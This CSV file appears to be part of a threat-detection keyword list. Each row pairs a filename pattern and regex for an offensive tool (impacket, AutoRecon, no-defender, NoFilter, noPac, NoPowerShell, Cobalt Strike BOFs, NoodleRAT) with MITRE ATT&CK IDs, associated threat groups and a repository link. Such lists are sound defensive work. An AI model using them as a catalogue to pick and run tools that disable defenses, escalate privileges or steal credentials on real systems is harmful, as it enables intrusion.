"*\nmapAnswerMachine.py*",".{0,1000}\\nmapAnswerMachine\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16890"
"*\nmap-cassandra.py*",".{0,1000}\\nmap\-cassandra\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16891"
"*\nmap-cups.py*",".{0,1000}\\nmap\-cups\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16892"
"*\nmap-distccd.py*",".{0,1000}\\nmap\-distccd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16893"
"*\nmap-dns.py*",".{0,1000}\\nmap\-dns\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16894"
"*\nmap-finger.py*",".{0,1000}\\nmap\-finger\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16895"
"*\nmap-ftp.py*",".{0,1000}\\nmap\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16896"
"*\nmap-http.py*",".{0,1000}\\nmap\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16897"
"*\nmap-imap.py*",".{0,1000}\\nmap\-imap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16898"
"*\nmap-irc.py*",".{0,1000}\\nmap\-irc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16899"
"*\nmap-kerberos.py*",".{0,1000}\\nmap\-kerberos\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16900"
"*\nmap-ldap.py*",".{0,1000}\\nmap\-ldap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16901"
"*\nmap-mongodb.py*",".{0,1000}\\nmap\-mongodb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16902"
"*\nmap-mountd.py*",".{0,1000}\\nmap\-mountd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16903"
"*\nmap-msrpc.py*",".{0,1000}\\nmap\-msrpc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16904"
"*\nmap-mssql.py*",".{0,1000}\\nmap\-mssql\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16905"
"*\nmap-multicast-dns.py*",".{0,1000}\\nmap\-multicast\-dns\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16906"
"*\nmap-mysql.py*",".{0,1000}\\nmap\-mysql\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16907"
"*\nmap-nfs.py*",".{0,1000}\\nmap\-nfs\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16908"
"*\nmap-nntp.py*",".{0,1000}\\nmap\-nntp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16909"
"*\nmap-ntp.py*",".{0,1000}\\nmap\-ntp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16910"
"*\nmap-oracle.py*",".{0,1000}\\nmap\-oracle\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16911"
"*\nmap-pop3.py*",".{0,1000}\\nmap\-pop3\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16912"
"*\nmap-rdp.py*",".{0,1000}\\nmap\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16913"
"*\nmap-redis.py*",".{0,1000}\\nmap\-redis\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16914"
"*\nmap-rmi.py*",".{0,1000}\\nmap\-rmi\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16915"
"*\nmap-rsync.py*",".{0,1000}\\nmap\-rsync\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16916"
"*\nmap-sip.py*",".{0,1000}\\nmap\-sip\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16917"
"*\nmap-smb.py*",".{0,1000}\\nmap\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16918"
"*\nmap-smtp.py*",".{0,1000}\\nmap\-smtp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16919"
"*\nmap-snmp.py*",".{0,1000}\\nmap\-snmp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16920"
"*\nmap-ssh.py*",".{0,1000}\\nmap\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16921"
"*\nmap-telnet.py*",".{0,1000}\\nmap\-telnet\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16922"
"*\nmap-tftp.py*",".{0,1000}\\nmap\-tftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16923"
"*\nmap-vnc.py*",".{0,1000}\\nmap\-vnc\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16924"
"*\nMethodNamespace=StandIn*",".{0,1000}\\nMethodNamespace\=StandIn.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","16925"
"*\no_defender.exe*",".{0,1000}\\no_defender\.exe.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16926"
"*\NoAmci.exe*",".{0,1000}\\NoAmci\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16927"
"*\NoAmsi.ps1*",".{0,1000}\\NoAmsi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16928"
"*\NoArgs.cpp*",".{0,1000}\\NoArgs\.cpp.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","16929"
"*\NoArgs.exe*",".{0,1000}\\NoArgs\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","16930"
"*\NoArgs.exe.config*",".{0,1000}\\NoArgs\.exe\.config.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","16931"
"*\NoArgs.exe.log*",".{0,1000}\\NoArgs\.exe\.log.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","16932"
"*\NoArgs_Encrypted.exe*",".{0,1000}\\NoArgs_Encrypted\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","16933"
"*\No-Consolation\source\*",".{0,1000}\\No\-Consolation\\source\\.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","16934"
"*\no-defender.exe*",".{0,1000}\\no\-defender\.exe.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16936"
"*\no-defender.sln*",".{0,1000}\\no\-defender\.sln.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16937"
"*\no-defender.vcxproj*",".{0,1000}\\no\-defender\.vcxproj.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16938"
"*\no-defender-loader.exe*",".{0,1000}\\no\-defender\-loader\.exe.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16939"
"*\no-defender-loader.pdb*",".{0,1000}\\no\-defender\-loader\.pdb.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16940"
"*\no-defender-loader.vcxproj*",".{0,1000}\\no\-defender\-loader\.vcxproj.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16941"
"*\no-defender-loader\main.cpp*",".{0,1000}\\no\-defender\-loader\\main\.cpp.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","16942"
"*\NodeRelayConsoleExe_d64.exe*",".{0,1000}\\NodeRelayConsoleExe_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","16943"
"*\Nofault.exe*",".{0,1000}\\Nofault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","16944"
"*\NoFilter.cpp*",".{0,1000}\\NoFilter\.cpp.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","16945"
"*\NoFilter.exe*",".{0,1000}\\NoFilter\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","16946"
"*\NoFilter.sln*",".{0,1000}\\NoFilter\.sln.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","16947"
"*\NoFilter.vcxproj*",".{0,1000}\\NoFilter\.vcxproj.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","16948"
"*\NoodMaker.exe*",".{0,1000}\\NoodMaker\.exe.{0,1000}","offensive_tool_keyword","NoodleRAT","AV signature of noodlerat malware","T1059.004 - T1078 - T1105 - T1100 - T1547.006","TA0003 - TA0005 - TA0010 - TA0011","N/A","N/A","Malware","https://www.trendmicro.com/en_us/research/24/f/noodle-rat-reviewing-the-new-backdoor-used-by-chinese-speaking-g.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16949"
"*\nopac.exe*",".{0,1000}\\nopac\.exe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","16950"
"*\nopac.py*",".{0,1000}\\nopac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16951"
"*\NoPowerShell*",".{0,1000}\\NoPowerShell.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","16952"
